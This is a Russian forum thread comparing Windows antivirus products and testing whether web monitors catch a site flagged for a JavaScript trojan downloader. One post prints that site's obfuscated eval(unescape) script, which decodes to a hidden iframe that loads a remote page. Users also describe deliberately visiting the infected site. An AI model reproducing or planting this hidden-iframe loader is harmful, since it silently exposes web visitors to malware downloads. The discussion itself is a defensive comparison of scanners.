» Обзор антивирусов под Windows

Цитата:

Особую награду за непонятливость получает AVG, которые до сих пор не могут разобраться, что же им прислали

Avast NOD BitDefender McAfee как обычно дрыхнут на рабочем месте
the dark project
Логично юзать фильтр в варезнике и не писать где попало!
http://forum.ru-board.com:9000/forum.cgi?action=filter&forum=35&filterby=topictitle&word=Webwasher

the dark project
Уже писалось об этом, кажется Да и на оффсайте можно почитать. WebWasher, как и Fortinet являются больше аппаратными решениями в виде шлюза с антивирусной проверкой проходящего траффика. А аппаратные решения не крякаются.

Хотя я и написал на оффсайт, посмотрим, что ответят.

Добавлено:
redwhiterus
Я тут подумал... Может у AVG слотов не хватает, чтобы с рапиды линку скачать. Сидят все на обычном V.90 модеме, а тут шлют по почте файлы размером 1 Мб - конечно, битые приходят! А с рапиды не получается - приходится по 100 минут ждать свободных слотов... Грешно смеяться над убогими!

Ладно, хватит уже об этом

Вот что значит сравнить пользовательское домашнее решение с професиональным программным апаратным комплексом! Вот как он вышло - то, господа.
Всем спасибо за подсказки, информацию и поммощ!

вцелом выходит то конторка серьезная, не тапочки вяжет.....

the dark project
Дык это и так понятно. А любая грамотно настроенная прокся лучше программного файервола. Но кто будет дома такое городить?

Да в принципе всё можно понять уже с этой картинки

Если кому-то интересно - можно заказать 30-дневнюю демку Webwashera тут Я зарегился - мне ни фига не пришло. Так что хз.

Цитата:

Дык это и так понятно. А любая грамотно настроенная прокся лучше программного файервола. Но кто будет дома такое городить?

Согласен и даже не обязательно Webwasher и их шлюз...

Цитата:

Ага.. Только где бы етот WEBWASHER взять??
Есть к нему кряки?

А чем Доктор не устаривает а

sereja8
Доктор установлен. Как и другие продукты. Хочетса попробовать и другое, что то, новое.

sereja8
Вероятно, хотя бы этим:

Там и F-Secure (F-Secure) отлично поработал. Я вот ставил его ужас один, 12 процессов висят в диспетчере задачь, при обнаружении вируса вылетает аллерт нажимаю удалить и ничего не происходит(не всегда так). Невозможно работать на компе, при проверке всего компа не смог вылечить вирусы пропатченные дропером одним (каспер лечит правда после того как писал им). Одним словом хлам. Каспер, Доктоп Веб, Эсет и Авира лучшие из лучших.

sereja8
Я не о том. Ты пробовал F-Secure - поэтому ты знаешь. А я пробовал Kaspersky, ESET, Avira, Avast, Norton - я могу сказать по ним (про три из которых - очень нелестное, но не в том суть). Ни ты, ни я ни слова не можем сказать про WebWasher. А может он действительно лучше? Поэтому вполне понятно желание the dark project его проверить.


Добавлено:
К вопросу о значимости и заменимости веб-монитора.
Предлагаю посетить http://www.ulibnis.net/ Вначале меня предупредил Гугль тут. Потом ругнулся веб-модуль Авиры на Tr/Dldr.IFrame.OE. Вот такой вот "Друг".

И ещё - хотелось бы узнать опыт бывалых, кто именно блокировал Громозон - веб-монитор или обычный монитор?

Цитата:

И ещё - хотелось бы узнать опыт бывалых, кто именно блокировал Громозон - веб-монитор или обычный монитор?

У Авиры - только веб-монитор

BBoris
Вот именно. А у других?

Цитата:

А у других?

Аваст весь входящий трафик веб-броузера (в т.ч. загрузка и радио) пропускает сначала через веб-экран. При обнаружении вируса, спрашивает прервать ли загрузку, но ответ значения не имеет - загрузка прерывается.

Sssvan
Ты не понял. Заражение Громозоном - вещь довольно комплексная, в сети об этом довольно много расписано - погугли. Суть такова, что большая часть заражения этим вирусом посредством IE (в других броузерах это не так явно) проходит именно на уровне веб-траффика: вначале через эксплоит, а затем через надстройку броузера качаются другие компоненты. После запуска добавляется ещё и недюжинная часть руткит-технологий.

Вот в этом плане мне и интересно, как происходит блокировка антивирусами без веб-компоненты, например, ДрВебом. Жаль, что www.gromozon.com прикрыли - можно было бы проверить. Хотя такая проверка и чревата

Я думаю, что именно подобная проверка и расставила бы точки над "ё" о том, нужна ли веб-защита или нет.

Добавлено:
Ну а то, что Аваст - вещь довольно сырая, я уже понял.

gjf

Цитата:

Ну а то, что Аваст - вещь довольно сырая, я уже понял

Ошибаешься. Может Аваст и середнячок, но не сырой. Он такой, какой есть. Я, например, отказался в его пользу от Нортона и Касперкского (с другими антивирями не работал).
ЗЫ. Загляни в ту тему, на которую ты сослался, - есть вопрос.

У мну в локалке появился вот такий зверек.
http://aborche.livejournal.com/1300.html

Лечить-то не проблема, если винт поставить на чистую машину.
Проблема лечить на зараженной машине. Неприятный звереныш.

the dark project
Я был прав, WebWasher - софт для шлюзов. Если интересно поковырять - я указал данные для закачки в соответствующей ветке.

Sssvan
Продолжим это обсуждение в ветке по Авасту! Я ответил там.

Molt
По ссыле сидит описание или зверь? Неохота натыкаться на зловреда неподготовленным.

Цитата:

По ссыле сидит описание или зверь? Неохота натыкаться на зловреда неподготовленным.

Описание. Только описание.
Я форумчанам зловредов не подсовываю, если что - только после предупреждения или в архивах с паролем.

gjf


Цитата:

К вопросу о значимости и заменимости веб-монитора.
Предлагаю посетить http://www.ulibnis.net/ Вначале меня предупредил Гугль тут. Потом ругнулся веб-модуль Авиры на Tr/Dldr.IFrame.OE. Вот такой вот "Друг".

у меня KIS 7.0.124 MOD ругнулся, мягко говоря, тоже(так, для проверки зашёл, узнать реакцию каспера).

Цитата:

обнаружено: троянская программа Trojan-Downloader.JS.Iframe.oe    URL: http:/

нашёл веб-антивирус. по логике, если веб-антивирус обнаружил и принял меры, то обычный моник(файловый) должен молчать. если же при включенном веб-мониторе подобную шнягу находит файловый антивирус - грош цена тогда такому веб-"антивирусу"

Цитата:

По ссыле сидит описание или зверь? Неохота натыкаться на зловреда неподготовленным.

описание

Molt
Ну теперь буду знать, мы лично знакомы не были.
Sality.y уже лечится. По крайней мере, Касперским. Дядя, на которого ты дал ссылку, молодец, но чем страдать геморроем и тратой времени на самостоятельное лечение заразы (может, это у него хобби, как у меня? ), надо было просто отправить письмо на поддержку. Про "трудное" дампирование процесса в памяти - яплакалъ!

И вообще, моё мнение, что подобные "статьи" - это просто самореклама на тему "какой я классный, такую проблему решил!" Ну біл Win32.CIH - и что? Был уже упомянутый всуе Rustock - и что? Для первых "пользователей" вируса эта зараза может и кажется вершиной творчества злого гения, но не для последующих.

И всегда интересно было бы видеть заразу "в лицо", а не в описаниях. Если у кого имеется такой файлик - ПМните.

parabellum
Да понятно, что после веба обычный монитор должен молчать. Я просто пытаюсь разобраться в старой теме о том, нужен ли веб-монитор или его функционал вполне может заменяться хорошим локальным монитором.

А пользователи DrWeb по той ссылке заходили? Если да - отпишитесь о результатах.

Добавлено:
parabellum
Убери ссылку из цитаты, где был обнаружен вирус - антивирус на форум теперь орёт

Цитата:

А пользователи DrWeb по той ссылке заходили? Если да - отпишитесь о результатах.

молчит Доктор......
обновления свежак, заход производился через "Огненного лиса"
З.Ы. чуствую пора прекращать эти эксперименты с проверками, а то не ровен час....
Заход делал с машины шефа - как бы мне потом боком не стало

serg_272
Ну теперь спор о ненужности веб-монитора считаю закрытым. Всем спасибо, все свободны

P.S. И чего было столько времени спорить - проверка элементарной оказалась.

serg_272
Цитата:

молчит Доктор......

Он вообще молчит, даже если его на файл скрипта вручную натравить. Хотя скрипт на виртуалке (ИЕ7) что-то не сработал. Фаер молчит, filemon и regmon тоже.

Ну ничего сказать не могу, я не знаю, что означает единственная функция в этом скрипте [more]эвал(унескапе("%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%5c%75%30%30%33%63%5c%75%30%30%36%39%5c%75%30%30%36%36%5c%75%30%30%37%32%5c%75%30%30%36%31%5c%75%30%30%36%64%5c%75%30%30%36%35%5c%75%30%30%32%30%5c%75%30%30%37%33%5c%75%30%30%37%32%5c%75%30%30%36%33%5c%75%30%30%33%64%5c%75%30%30%32%32%5c%75%30%30%36%38%5c%75%30%30%37%34%5c%75%30%30%37%34%5c%75%30%30%37%30%5c%75%30%30%33%61%5c%75%30%30%32%66%5c%75%30%30%32%66%5c%75%30%30%36%33%5c%75%30%30%36%66%5c%75%30%30%37%35%5c%75%30%30%36%65%5c%75%30%30%37%34%5c%75%30%30%36%35%5c%75%30%30%37%32%5c%75%30%30%36%64%5c%75%30%30%36%35%5c%75%30%30%36%34%5c%75%30%30%36%39%5c%75%30%30%36%31%5c%75%30%30%36%37%5c%75%30%30%37%32%5c%75%30%30%36%66%5c%75%30%30%37%35%5c%75%30%30%37%30%5c%75%30%30%32%65%5c%75%30%30%36%33%5c%75%30%30%36%66%5c%75%30%30%36%64%5c%75%30%30%32%66%5c%75%30%30%37%34%5c%75%30%30%37%33%5c%75%30%30%32%66%5c%75%30%30%36%39%5c%75%30%30%36%65%5c%75%30%30%32%65%5c%75%30%30%36%33%5c%75%30%30%36%37%5c%75%30%30%36%39%5c%75%30%30%33%66%5c%75%30%30%36%64%5c%75%30%30%37%39%5c%75%30%30%36%64%5c%75%30%30%37%39%5c%75%30%30%32%32%5c%75%30%30%32%30%5c%75%30%30%37%37%5c%75%30%30%36%39%5c%75%30%30%36%34%5c%75%30%30%37%34%5c%75%30%30%36%38%5c%75%30%30%33%64%5c%75%30%30%33%31%5c%75%30%30%32%30%5c%75%30%30%36%38%5c%75%30%30%36%35%5c%75%30%30%36%39%5c%75%30%30%36%37%5c%75%30%30%36%38%5c%75%30%30%37%34%5c%75%30%30%33%64%5c%75%30%30%33%31%5c%75%30%30%32%30%5c%75%30%30%37%33%5c%75%30%30%37%34%5c%75%30%30%37%39%5c%75%30%30%36%63%5c%75%30%30%36%35%5c%75%30%30%33%64%5c%75%30%30%32%32%5c%75%30%30%37%36%5c%75%30%30%36%39%5c%75%30%30%37%33%5c%75%30%30%36%39%5c%75%30%30%36%32%5c%75%30%30%36%39%5c%75%30%30%36%63%5c%75%30%30%36%39%5c%75%30%30%37%34%5c%75%30%30%37%39%5c%75%30%30%33%61%5c%75%30%30%36%38%5c%75%30%30%36%39%5c%75%30%30%36%34%5c%75%30%30%36%34%5c%75%30%30%36%35%5c%75%30%30%36%65%5c%75%30%30%33%62%5c%75%30%30%37%30%5c%75%30%30%36%66%5c%75%30%30%37%33%5c%75%30%30%36%39%5c%75%30%30%37%34%5c%75%30%30%36%39%5c%75%30%30%36%66%5c%75%30%30%36%65%5c%75%30%30%33%61%5c%75%30%30%36%31%5c%75%30%30%36%32%5c%75%30%30%37%33%5c%75%30%30%36%66%5c%75%30%30%36%63%5c%75%30%30%37%35%5c%75%30%30%37%34%5c%75%30%30%36%35%5c%75%30%30%32%32%5c%75%30%30%33%65%5c%75%30%30%33%63%5c%75%30%30%32%66%5c%75%30%30%36%39%5c%75%30%30%36%36%5c%75%30%30%37%32%5c%75%30%30%36%31%5c%75%30%30%36%64%5c%75%30%30%36%35%5c%75%30%30%33%65%27%29%3b"));

Писал специально русскими, чтобы не орал антивирус. [/more]

VBA32 Белоруссия + File Mail Программы [?] Варезник [?] -

ээ не знаю такой страны. Беларусь знаю только

Хм, интересно: на Авире я выключил веб-проверку и зашёл на сайт. Обычный монитор не орал. Потом включил веб-защиту и опять зашёл на сайт. Крик был страшным. Кто именно отвечает за блокировку сайтовых скриптов у Авиры - понятно. Что у Касперского и товарищи? Попробуйте зайти с выключенным веб-монитором (если не страшно, конечно )

mmrddelfby
Ошибся разделом. Тебе сюда:
http://forum.ru-board.com/forum.cgi?forum=29

При заходе на w w w . u l i b n i s . n e t IE предупредил:
"The website wants to run the following add-on: 'Works converter' from 'Micorsoft Corporation'... "
Запустил и ничего.

Почему то, что считается вирусом (u r c h i n . j s), ничего вредоносного не сделало на WinXpSp3/IE7/Office2007SP1?

acnevulgaris
А почему ты решил, что не сделало? Цифровую подпись "addonа" проверял? Антивирь какой?

gjf
Такого add-onа не существует (у меня).
После эксперемента перезагрузился, проверил полностью С: и оставил включенными как мониторы DrWeb и ZASS, снова перезагрузился.
В логах ZASS также ничего нет.